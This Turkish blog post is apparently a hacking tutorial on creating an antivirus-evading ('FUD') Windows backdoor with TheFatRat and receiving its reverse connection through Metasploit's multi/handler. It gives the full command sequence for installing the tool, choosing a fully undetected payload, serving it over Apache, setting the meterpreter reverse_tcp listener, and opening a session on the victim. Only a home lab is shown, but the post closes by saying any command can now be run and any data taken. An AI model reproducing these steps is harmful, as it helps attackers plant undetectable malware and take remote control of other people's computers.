Fatrat İle Backdoor Oluşturma ve MSFCONSOLE İle Exploit Etme

FATRAT İLE BACKDOOR OLUŞTURMA


Veil ile backdoor oluşturmaya altarnatif Fatrat Toolu İle Backdoor Oluşturma

FUD Nedir ?

Öncelikle FUD yani Full Undetected denilen şey zararlı yazılım ve kod parçacağı içeren dosyayı tamamen virüssüz olarak gösteren bir Crypter sistemdir. Normal şartlarda antivirüs uygulamaları tarafından tespit edilmesi gereken, içerisinde zararlı kod parçacıkları ve yazılımlar barındıran dosyaların tümünün antivürüs tarafından tespit edilememesini, doğal olarak da dosyanın temiz görünmesini sağlar. Fatrat  bu şekilde çalışma odaklı bir tooldur.

Fatrat Yükleme

Google'a fatrat github deyip code linkini kopyalıyoruz.

--> git clone "https://github.com/screetsec/TheFatRat.git" 

--> sudo bash setup.sh 

--> cd /usr/share/metasploit-framework

--> gem install bundler 

--> bundle install  diyoruz son olarak ve kurulum tamamlanıyor.(Söylenilen her şeyi yüklemediğiniz takdirde çalışmayacaktır)

Fatrat Kullanım

--> fatrat



--> 2 (Create Fud %100 Backdoor with Fudwin-> Fudwin ile %100 yakalanmayan backdoor yaratma ben bunu seçiyorum istediğiniz özelliğe göre backdoor oluşturabilirsiniz.)

--> 2 (Slow but powerfull-> Yavaş ama güçlü )



--> 10.0.2.15 ( Kendi IP'mizi yazıyoruz)



-> 5555 (Portu da istediğiniz gibi deneyebilirsiniz hangisiyle çalışırsa )

-> 1 (32 bit olanı seçiyorum çünkü bu hem 32 hem de 64 biti kapsıyor)




Ve backdoorumuz oluşmaya başlıyor. Bu arada root içerisinde Fatrat_Generated adında klasör oluşuturuyor ve backdoorumuzu bunun içine kaydediyor. İstersek ismini değiştirebiliriz. Test etmek amacıyla backdoorumuzu var/www/html/backdoors klasörüne alıyoruz. Sanal windows makinamızda Url 'den buraya giderek backdoorun çalışıp çalışmadığını kontrol edeceğiz.

Oluşturduğumuz Backdoor'u Test Etmek İçin Multi-Handler

--> service apache2 start ( Kendi Kali sunucumuzu başlatıyoruz Windows sanal makinadan buraya girip backdoorumuzu deneyeceğiz.)

Yeni terminal açıyoruz : 

--> msfconsole



--> use exploit/multi/handler





--> set PAYLOAD windows/meterpreter/reverse_tcp

--> show options 

--> set LHOST 10.0.2.15 (Kali IP)

--> set LPORT 5555



--> show options 

--> exploit (Dinlemeye başlıyoruz. Artık bundan sonra hedef bilgisayarda dosyamız açılmalı)

Exploit başladıktan sonra windows makinaya gidip 10.0.2.15/backdoors (Kali sunucusundan) Dosyayı indiriyoruz ve çalıştırıyoruz.

--> sessions -l ( Varolan oturumları görüntülüyoruz )

--> sessions 1 ( Girmek istediğimiz sessions seçiyoruz )

--> ls ( Bulunduğumuz klasörün içindekileri görüntüleyebiliriz)

--> pwd ( Güncel olarak hangi klasörün içinde olduğumuzu gösteriyor )



Böylelikle windows makinasının içindeyiz artık istediğimiz komutları çalıştırıp istediğimiz bilgiyi alabiliriz. Fatrat ile backdoor oluşturup hedefi exploit etmeyi öğrendik. İyi okumalar ve iyi çalışmalar.

Yorumlar

Bu blogdaki popüler yayınlar

Kali Linux Veil-Framework Nedir ? Nasıl Kullanılır ?

İMAJ TİPLERİ DEĞİŞİNCE HASH DEĞİŞİR Mİ ?